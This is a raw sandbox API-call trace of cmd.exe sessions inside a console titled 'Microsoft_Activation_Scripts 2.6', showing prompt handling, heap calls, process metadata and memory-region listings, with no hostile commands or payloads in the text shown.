_get_osfhandle (_FileHandle=1) returned 0x98 [0176.968] GetFileType (hFile=0x98) returned 0x3 [0176.968] _get_osfhandle (_FileHandle=1) returned 0x98 [0176.968] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x7ff7bd735b80, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3 [0176.968] WriteFile (in: hFile=0x98, lpBuffer=0x7ff7bd735b80*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x9cea4ff808, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesWritten=0x9cea4ff808*=0x2, lpOverlapped=0x0) returned 1 [0176.968] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x4 [0176.968] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x7ff7bd731940 | out: lpBuffer="C:\\Windows\\System32") returned 0x13 [0176.968] _vsnwprintf (in: _Buffer=0x7ff7bd724de0, _BufferCount=0x3fe, _Format="%s", _ArgList=0x9cea4ff858 | out: _Buffer="C:\\Windows\\System32") returned 19 [0176.969] _vsnwprintf (in: _Buffer=0x7ff7bd724e06, _BufferCount=0x3eb, _Format="%c", _ArgList=0x9cea4ff858 | out: _Buffer=">") returned 1 [0176.969] _get_osfhandle (_FileHandle=1) returned 0x98 [0176.969] GetFileType (hFile=0x98) returned 0x3 [0176.969] _get_osfhandle (_FileHandle=1) returned 0x98 [0176.969] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="C:\\Windows\\System32>", cchWideChar=-1, lpMultiByteStr=0x7ff7bd735b80, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\System32>", lpUsedDefaultChar=0x0) returned 21 [0176.969] WriteFile (in: hFile=0x98, lpBuffer=0x7ff7bd735b80*, nNumberOfBytesToWrite=0x14, lpNumberOfBytesWritten=0x9cea4ff848, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesWritten=0x9cea4ff848*=0x14, lpOverlapped=0x0) returned 1 [0176.969] _get_osfhandle (_FileHandle=0) returned 0x20 [0176.969] GetFileType (hFile=0x20) returned 0x3 [0176.969] _get_osfhandle (_FileHandle=0) returned 0x20 [0176.969] SetFilePointer (in: hFile=0x20, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0176.969] ReadFile (in: hFile=0x20, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x9cea4ffb88, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x9cea4ffb88*=0x1, lpOverlapped=0x0) returned 1 [0176.969] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="p:\\Windows\\System32>", cbMultiByte=1, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=1 | out: lpWideCharStr="p") returned 1 [0176.969] _get_osfhandle (_FileHandle=0) returned 0x20 [0176.969] SetFilePointer (in: hFile=0x20, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0176.969] ReadFile (in: hFile=0x20, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x9cea4ffb88, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x9cea4ffb88*=0x1, lpOverlapped=0x0) returned 1 [0176.969] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="r:\\Windows\\System32>", cbMultiByte=1, lpWideCharStr=0x7ff7bd7209e2, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0176.969] _get_osfhandle (_FileHandle=0) returned 0x20 [0176.969] SetFilePointer (in: hFile=0x20, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0176.970] ReadFile (in: hFile=0x20, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x9cea4ffb88, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x9cea4ffb88*=0x1, lpOverlapped=0x0) returned 1 [0176.970] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="o:\\Windows\\System32>", cbMultiByte=1, lpWideCharStr=0x7ff7bd7209e4, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0176.970] _get_osfhandle (_FileHandle=0) returned 0x20 [0176.970] SetFilePointer (in: hFile=0x20, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0176.970] ReadFile (in: hFile=0x20, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x9cea4ffb88, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x9cea4ffb88*=0x1, lpOverlapped=0x0) returned 1 [0176.970] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="m:\\Windows\\System32>", cbMultiByte=1, lpWideCharStr=0x7ff7bd7209e6, cchWideChar=1 | out: lpWideCharStr="m") returned 1 [0176.970] _get_osfhandle (_FileHandle=0) returned 0x20 [0176.970] SetFilePointer (in: hFile=0x20, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0176.970] ReadFile (in: hFile=0x20, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x9cea4ffb88, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x9cea4ffb88*=0x1, lpOverlapped=0x0) returned 1 [0176.970] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="p:\\Windows\\System32>", cbMultiByte=1, lpWideCharStr=0x7ff7bd7209e8, cchWideChar=1 | out: lpWideCharStr="p") returned 1 [0176.970] _get_osfhandle (_FileHandle=0) returned 0x20 [0176.970] SetFilePointer (in: hFile=0x20, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0176.970] ReadFile (in: hFile=0x20, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x9cea4ffb88, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x9cea4ffb88*=0x1, lpOverlapped=0x0) returned 1 [0176.970] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="t:\\Windows\\System32>", cbMultiByte=1, lpWideCharStr=0x7ff7bd7209ea, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0176.970] _get_osfhandle (_FileHandle=0) returned 0x20 [0176.970] SetFilePointer (in: hFile=0x20, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0176.970] ReadFile (in: hFile=0x20, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x9cea4ffb88, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x9cea4ffb88*=0x1, lpOverlapped=0x0) returned 1 [0176.970] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=" :\\Windows\\System32>", cbMultiByte=1, lpWideCharStr=0x7ff7bd7209ec, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0176.970] _get_osfhandle (_FileHandle=0) returned 0x20 [0176.970] SetFilePointer (in: hFile=0x20, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0176.971] ReadFile (in: hFile=0x20, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x9cea4ffb88, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x9cea4ffb88*=0x1, lpOverlapped=0x0) returned 1 [0176.971] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="$:\\Windows\\System32>", cbMultiByte=1, lpWideCharStr=0x7ff7bd7209ee, cchWideChar=1 | out: lpWideCharStr="$") returned 1 [0176.971] _get_osfhandle (_FileHandle=0) returned 0x20 [0176.971] SetFilePointer (in: hFile=0x20, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0176.971] ReadFile (in: hFile=0x20, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x9cea4ffb88, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x9cea4ffb88*=0x1, lpOverlapped=0x0) returned 1 [0176.971] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="E:\\Windows\\System32>", cbMultiByte=1, lpWideCharStr=0x7ff7bd7209f0, cchWideChar=1 | out: lpWideCharStr="E") returned 1 [0176.971] _get_osfhandle (_FileHandle=0) returned 0x20 [0176.971] SetFilePointer (in: hFile=0x20, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0176.971] ReadFile (in: hFile=0x20, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x9cea4ffb88, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x9cea4ffb88*=0x1, lpOverlapped=0x0) returned 1 [0176.971] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=" :\\Windows\\System32>", cbMultiByte=1, lpWideCharStr=0x7ff7bd7209f2, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0176.971] _get_osfhandle (_FileHandle=0) returned 0x20 [0176.971] SetFilePointer (in: hFile=0x20, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0176.971] ReadFile (in: hFile=0x20, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x9cea4ffb88, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x9cea4ffb88*=0x1, lpOverlapped=0x0) returned 1 [0176.971] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r:\\Windows\\System32>", cbMultiByte=1, lpWideCharStr=0x7ff7bd7209f4, cchWideChar=1 | out: lpWideCharStr="\r") returned 1 [0176.971] _get_osfhandle (_FileHandle=0) returned 0x20 [0176.971] SetFilePointer (in: hFile=0x20, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0176.971] ReadFile (in: hFile=0x20, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x9cea4ffb88, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x9cea4ffb88*=0x1, lpOverlapped=0x0) returned 1 [0176.971] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\n:\\Windows\\System32>", cbMultiByte=1, lpWideCharStr=0x7ff7bd7209f6, cchWideChar=1 | out: lpWideCharStr="\n") returned 1 [0176.972] _get_osfhandle (_FileHandle=0) returned 0x20 [0176.972] GetFileType (hFile=0x20) returned 0x3 [0176.972] _get_osfhandle (_FileHandle=0) returned 0x20 [0176.972] SetFilePointer (in: hFile=0x20, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0176.972] _get_osfhandle (_FileHandle=1) returned 0x98 [0176.972] GetFileType (hFile=0x98) returned 0x3 [0176.972] _get_osfhandle (_FileHandle=1) returned 0x98 [0176.972] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="prompt $E \r\n", cchWideChar=-1, lpMultiByteStr=0x7ff7bd735b80, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="prompt $E \r\n", lpUsedDefaultChar=0x0) returned 13 [0176.972] WriteFile (in: hFile=0x98, lpBuffer=0x7ff7bd735b80*, nNumberOfBytesToWrite=0xc, lpNumberOfBytesWritten=0x9cea4ffb28, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesWritten=0x9cea4ffb28*=0xc, lpOverlapped=0x0) returned 1 [0176.972] GetProcessHeap () returned 0x27918a50000 [0176.972] RtlAllocateHeap (HeapHandle=0x27918a50000, Flags=0x8, Size=0x4012) returned 0x27918a5bcb0 [0176.972] GetProcessHeap () returned 0x27918a50000 [0176.973] RtlFreeHeap (HeapHandle=0x27918a50000, Flags=0x0, BaseAddress=0x27918a5bcb0) returned 1 [0176.977] _wcsicmp (_String1="prompt", _String2=")") returned 71 [0176.977] _wcsicmp (_String1="FOR", _String2="prompt") returned -10 [0176.977] _wcsicmp (_String1="FOR/?", _String2="prompt") returned -10 [0176.977] _wcsicmp (_String1="IF", _String2="prompt") returned -7 [0176.977] _wcsicmp (_String1="IF/?", _String2="prompt") returned -7 [0176.977] _wcsicmp (_String1="REM", _String2="prompt") returned 2 [0176.977] _wcsicmp (_String1="REM/?", _String2="prompt") returned 2 [0176.977] GetProcessHeap () returned 0x27918a50000 [0176.977] RtlAllocateHeap (HeapHandle=0x27918a50000, Flags=0x8, Size=0xb0) returned 0x27918a564f0 [0176.977] GetProcessHeap () returned 0x27918a50000 [0176.977] RtlAllocateHeap (HeapHandle=0x27918a50000, Flags=0x8, Size=0x1e) returned 0x27918a56340 [0176.978] GetProcessHeap () returned 0x27918a50000 [0176.978] RtlAllocateHeap (HeapHandle=0x27918a50000, Flags=0x8, Size=0x1a) returned 0x27918a56370 [0176.978] GetConsoleOutputCP () returned 0x1b5 [0176.988] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff7bd729660 | out: lpCPInfo=0x7ff7bd729660) returned 1 [0176.988] SetThreadUILanguage (LangId=0x0) returned 0x409 [0176.989] GetConsoleTitleW (in: lpConsoleTitle=0x9cea4ff970, nSize=0x104 | out: lpConsoleTitle="Administrator: Microsoft_Activation_Scripts 2.6") returned 0x31 [0176.992] _wcsicmp (_String1="prompt", _String2="DIR") returned 12 [0176.992] _wcsicmp (_String1="prompt", _String2="ERASE") returned 11 [0176.992] _wcsicmp (_String1="prompt", _String2="DEL") returned 12 [0176.992] _wcsicmp (_String1="prompt", _String2="TYPE") returned -4 [0176.992] _wcsicmp (_String1="prompt", _String2="COPY") returned 13 [0176.992] _wcsicmp (_String1="prompt", _String2="CD") returned 13 [0176.992] _wcsicmp (_String1="prompt", _String2="CHDIR") returned 13 [0176.992] _wcsicmp (_String1="prompt", _String2="RENAME") returned -2 [0176.992] _wcsicmp (_String1="prompt", _String2="REN") returned -2 [0176.992] _wcsicmp (_String1="prompt", _String2="ECHO") returned 11 [0176.993] _wcsicmp (_String1="prompt", _String2="SET") returned -3 [0176.993] _wcsicmp (_String1="prompt", _String2="PAUSE") returned 17 [0176.993] _wcsicmp (_String1="prompt", _String2="DATE") returned 12 [0176.993] _wcsicmp (_String1="prompt", _String2="TIME") returned -4 [0176.993] _wcsicmp (_String1="prompt", _String2="PROMPT") returned 0 [0176.993] GetProcessHeap () returned 0x27918a50000 [0176.993] RtlAllocateHeap (HeapHandle=0x27918a50000, Flags=0x8, Size=0x24) returned 0x27918a5bf10 [0176.993] GetProcessHeap () returned 0x27918a50000 [0176.993] RtlReAllocateHeap (Heap=0x27918a50000, Flags=0x0, Ptr=0x27918a5bf10, Size=0x18) returned 0x27918a560e0 [0176.993] GetProcessHeap () returned 0x27918a50000 [0176.994] RtlSizeHeap (HeapHandle=0x27918a50000, Flags=0x0, MemoryPointer=0x27918a560e0) returned 0x18 [0176.994] GetProcessHeap () returned 0x27918a50000 [0176.994] RtlAllocateHeap (HeapHandle=0x27918a50000, Flags=0x8, Size=0x28) returned 0x27918a5bdc0 [0176.994] GetProcessHeap () returned 0x27918a50000 [0176.994] RtlAllocateHeap (HeapHandle=0x27918a50000, Flags=0x8, Size=0x21c) returned 0x27918a57ae0 [0176.994] GetConsoleTitleW (in: lpConsoleTitle=0x27918a57af0, nSize=0x104 | out: lpConsoleTitle="Administrator: Microsoft_Activation_Scripts 2.6") returned 0x31 [0176.995] GetProcessHeap () returned 0x27918a50000 [0176.995] RtlReAllocateHeap (Heap=0x27918a50000, Flags=0x0, Ptr=0x27918a57ae0, Size=0x9c) returned 0x27918a57ae0 [0176.995] GetProcessHeap () returned 0x27918a50000 [0176.995] RtlSizeHeap (HeapHandle=0x27918a50000, Flags=0x0, MemoryPointer=0x27918a57ae0) returned 0x9c [0176.995] SetConsoleTitleW (lpConsoleTitle="Administrator: Microsoft_Activation_Scripts 2.6 - prompt $E ") returned 1 [0177.008] GetProcessHeap () returned 0x27918a50000 [0177.010] RtlFreeHeap (HeapHandle=0x27918a50000, Flags=0x0, BaseAddress=0x27918a57ae0) returned 1 [0177.010] GetProcessHeap () returned 0x27918a50000 [0177.010] RtlAllocateHeap (HeapHandle=0x27918a50000, Flags=0x8, Size=0x24) returned 0x27918a5beb0 [0177.010] GetProcessHeap () returned 0x27918a50000 [0177.010] RtlReAllocateHeap (Heap=0x27918a50000, Flags=0x0, Ptr=0x27918a5beb0, Size=0x1a) returned 0x27918a5bee0 [0177.010] GetProcessHeap () returned 0x27918a50000 [0177.010] RtlSizeHeap (HeapHandle=0x27918a50000, Flags=0x0, MemoryPointer=0x27918a5bee0) returned 0x1a [0177.010] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$E ") returned 1 [0177.010] GetProcessHeap () returned 0x27918a50000 [0177.010] RtlFreeHeap (HeapHandle=0x27918a50000, Flags=0x0, BaseAddress=0x27918a5a600) returned 1 [0177.010] GetEnvironmentStringsW () returned 0x27918a5a600* [0177.010] GetProcessHeap () returned 0x27918a50000 [0177.010] RtlAllocateHeap (HeapHandle=0x27918a50000, Flags=0x8, Size=0xbec) returned 0x27918a5c0c0 [0177.010] memcpy (in: _Dst=0x27918a5c0c0, _Src=0x27918a5a600, _Size=0xbec | out: _Dst=0x27918a5c0c0) returned 0x27918a5c0c0 [0177.010] FreeEnvironmentStringsA (penv="=") returned 1 [0177.010] SetConsoleTitleW (lpConsoleTitle="Administrator: Microsoft_Activation_Scripts 2.6") returned 1 [0177.015] _get_osfhandle (_FileHandle=1) returned 0x98 [0177.015] SetConsoleMode (hConsoleHandle=0x98, dwMode=0x0) returned 0 [0177.015] _get_osfhandle (_FileHandle=1) returned 0x98 [0177.015] GetConsoleMode (in: hConsoleHandle=0x98, lpMode=0x7ff7bd72960c | out: lpMode=0x7ff7bd72960c) returned 0 [0177.015] _get_osfhandle (_FileHandle=0) returned 0x20 [0177.015] GetConsoleMode (in: hConsoleHandle=0x20, lpMode=0x7ff7bd729608 | out: lpMode=0x7ff7bd729608) returned 0 [0177.015] GetConsoleOutputCP () returned 0x1b5 [0177.015] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff7bd729660 | out: lpCPInfo=0x7ff7bd729660) returned 1 [0177.015] SetThreadUILanguage (LangId=0x0) returned 0x409 [0177.016] GetProcessHeap () returned 0x27918a50000 [0177.016] RtlFreeHeap (HeapHandle=0x27918a50000, Flags=0x0, BaseAddress=0x27918a5bee0) returned 1 [0177.016] GetProcessHeap () returned 0x27918a50000 [0177.016] RtlFreeHeap (HeapHandle=0x27918a50000, Flags=0x0, BaseAddress=0x27918a5bdc0) returned 1 [0177.016] GetProcessHeap () returned 0x27918a50000 [0177.016] RtlFreeHeap (HeapHandle=0x27918a50000, Flags=0x0, BaseAddress=0x27918a560e0) returned 1 [0177.017] GetProcessHeap () returned 0x27918a50000 [0177.017] RtlFreeHeap (HeapHandle=0x27918a50000, Flags=0x0, BaseAddress=0x27918a56370) returned 1 [0177.017] GetProcessHeap () returned 0x27918a50000 [0177.017] RtlFreeHeap (HeapHandle=0x27918a50000, Flags=0x0, BaseAddress=0x27918a56340) returned 1 [0177.017] GetProcessHeap () returned 0x27918a50000 [0177.017] RtlFreeHeap (HeapHandle=0x27918a50000, Flags=0x0, BaseAddress=0x27918a564f0) returned 1 [0177.017] _vsnwprintf (in: _Buffer=0x7ff7bd731b60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x9cea4ff848 | out: _Buffer="\r\n") returned 2 [0177.017] _get_osfhandle (_FileHandle=1) returned 0x98 [0177.017] GetFileType (hFile=0x98) returned 0x3 [0177.017] _get_osfhandle (_FileHandle=1) returned 0x98 [0177.017] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x7ff7bd735b80, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3 [0177.017] WriteFile (in: hFile=0x98, lpBuffer=0x7ff7bd735b80*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x9cea4ff808, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesWritten=0x9cea4ff808*=0x2, lpOverlapped=0x0) returned 1 [0177.018] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x3 [0177.018] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x7ff7bd731940 | out: lpBuffer="C:\\Windows\\System32") returned 0x13 [0177.018] _vsnwprintf (in: _Buffer=0x7ff7bd724de0, _BufferCount=0x3fe, _Format="%c", _ArgList=0x9cea4ff858 | out: _Buffer="\x1b") returned 1 [0177.018] _vsnwprintf (in: _Buffer=0x7ff7bd724de2, _BufferCount=0x3fd, _Format="%c", _ArgList=0x9cea4ff858 | out: _Buffer=" ") returned 1 [0177.018] _get_osfhandle (_FileHandle=1) returned 0x98 [0177.018] GetFileType (hFile=0x98) returned 0x3 [0177.018] _get_osfhandle (_FileHandle=1) returned 0x98 [0177.018] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x1b ", cchWideChar=-1, lpMultiByteStr=0x7ff7bd735b80, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x1b ", lpUsedDefaultChar=0x0) returned 3 [0177.018] WriteFile (in: hFile=0x98, lpBuffer=0x7ff7bd735b80*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x9cea4ff848, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesWritten=0x9cea4ff848*=0x2, lpOverlapped=0x0) returned 1 [0177.018] _get_osfhandle (_FileHandle=0) returned 0x20 [0177.018] GetFileType (hFile=0x20) returned 0x3 [0177.018] _get_osfhandle (_FileHandle=0) returned 0x20 [0177.018] SetFilePointer (in: hFile=0x20, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0177.018] ReadFile (in: hFile=0x20, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x9cea4ffb88, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80, lpNumberOfBytesRead=0x9cea4ffb88*=0x0, lpOverlapped=0x0) returned 0 [0177.019] GetLastError () returned 0x6d [0177.019] _get_osfhandle (_FileHandle=0) returned 0x20 [0177.019] GetFileType (hFile=0x20) returned 0x3 [0177.019] _get_osfhandle (_FileHandle=1) returned 0x98 [0177.019] SetConsoleMode (hConsoleHandle=0x98, dwMode=0x0) returned 0 [0177.019] _get_osfhandle (_FileHandle=1) returned 0x98 [0177.019] GetConsoleMode (in: hConsoleHandle=0x98, lpMode=0x7ff7bd72960c | out: lpMode=0x7ff7bd72960c) returned 0 [0177.019] _get_osfhandle (_FileHandle=0) returned 0x20 [0177.019] GetConsoleMode (in: hConsoleHandle=0x20, lpMode=0x7ff7bd729608 | out: lpMode=0x7ff7bd729608) returned 0 [0177.019] longjmp () [0177.019] exit (_Code=0) Thread: id = 59 os_tid = 0x112c Process: id = "14" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x508ea000" os_pid = "0x13d8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x9e4" cmd_line = "C:\\Windows\\system32\\cmd.exe /S /D /c\" echo \"C:\\Windows\\Temp\\MAS_15344413.cmd\" \"" cur_dir = "C:\\Windows\\System32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ff75" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1243 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1244 start_va = 0xb90ef0000 end_va = 0xb90feffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000b90ef0000" filename = "" Region: id = 1245 start_va = 0xb91000000 end_va = 0xb911fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000b91000000" filename = "" Region: id = 1246 start_va = 0x1232fcb0000 end_va = 0x1232fccffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001232fcb0000" filename = "" Region: id = 1247 start_va = 0x1232fcd0000 end_va = 0x1232fce4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001232fcd0000" filename = "" Region: id = 1248 start_va = 0x1232fcf0000 end_va = 0x1232fcf3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001232fcf0000" filename = "" Region: id = 1249 start_va = 0x1232fd00000 end_va = 0x1232fd00fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001232fd00000" filename = "" Region: id = 1250 start_va = 0x1232fd10000 end_va = 0x1232fd11fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001232fd10000" filename = "" Region: id = 1251 start_va = 0x7df5ff3c0000 end_va = 0x7ff5ff3bffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff3c0000" filename = "" Region: id = 1252 start_va = 0x7ff7bd210000 end_va = 0x7ff7bd232fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff7bd210000" filename = "" Region: id = 1253 start_va = 0x7ff7bd6f0000 end_va = 0x7ff7bd749fff monitored = 1 entry_point = 0x7ff7bd7053f0 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 1254 start_va = 0x7ffbed960000 end_va = 0x7ffbedb20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1267 start_va = 0x1232fd20000 end_va = 0x1232ff8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001232fd20000" filename = "" Region: id = 1268 start_va = 0x7ffbed570000 end_va = 0x7ffbed61cfff monitored = 0 entry_point = 0x7ffbed5881a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1269 start_va = 0x7ffbea3c0000 end_va = 0x7ffbea5a7fff monitored = 0 entry_point = 0x7ffbea3eba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1270 start_va = 0x1232fcb0000 end_va = 0x1232fcbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001232fcb0000" filename = "" Region: id = 1271 start_va = 0x7ff7bd110000 end_va = 0x7ff7bd20ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff7bd110000" filename = "" Region: id = 1277 start_va = 0x1232fd20000 end_va = 0x1232fdddfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" 